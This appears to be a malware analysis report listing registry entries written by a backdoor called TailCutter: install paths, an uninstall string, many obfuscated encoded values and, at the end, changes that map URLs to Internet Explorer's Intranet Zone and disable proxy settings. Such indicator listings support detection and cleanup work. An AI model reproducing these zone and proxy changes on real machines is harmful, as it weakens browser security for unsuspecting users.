[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"3c09c42b" = "///%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f0bf0bde" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"414bc593" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"
"c6c5dd44" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"
"72758a5d" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d1abcdb6" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"iiid" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB D9 BC F2 72 8D E9 64 75 E5 45 0A 51 D4 15 46"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svn" = "TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svi" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"dlpath" = "c:\progra~1\tailcu~1\tailcu~1.dll"
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c6c5dd44" = "V/////%%"
"e46c271e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"3efeb33e" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2e22d94e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.1" = "6t1JF1FHwysurpnikg"
"usr.0" = "oMUlaLmjlhabcdefAB"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"c6d15ff2" = "%Program Files%\TailCutter\TailCutter.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"uuid" = "12802899647634509424"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"a2e3b941" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Install_Dir" = "%Program Files%\TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svn" = "TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svi" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1520c6f1" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svt" = "1431212851"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"InstallDate" = "20140510"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svpath" = "c:\Program Files\TailCutter\TailCutter.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"CategoryName" = "%SearchDefenderUpdaterKeys_CategoryName%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Mode" = "4026531840"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Version" = "22022131"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"date" = "1431212812"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7367429f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svt" = "1431212851"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"LRTS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Version" = "22022131"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

